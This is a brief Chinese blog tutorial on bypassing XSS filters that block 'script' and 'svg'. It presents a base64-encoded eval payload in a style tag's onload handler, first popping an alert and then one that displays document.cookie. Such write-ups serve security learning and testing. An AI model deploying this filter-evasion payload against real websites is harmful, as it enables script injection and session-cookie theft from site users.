您的位置:首页 > 其它

xss技巧之绕过script和svg的过滤

2021-05-27 17:54 127 查看

0x00 原理

  已知页面存在xss,但是过滤了script和 svg,可以用什么payload?

0x01 payload

<style onload=eval(atob("YWxlcnQoMSkK"));></style>
  • atob函数是进行base64解码,eval是执行,这里YWxlcnQoMSkK解码后其实是alert('1')
  • payload比起原先的<script>alert('xss')</script> 功能可能还要更强大,因为它可以直接执行我们的js代码。

0x02 实战

  • 使用原payload

  • 如果想要弹cookie 修改为 alert(document.cookie)

<style onload=eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="));></style>

这里直接拿到 了 cookie

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航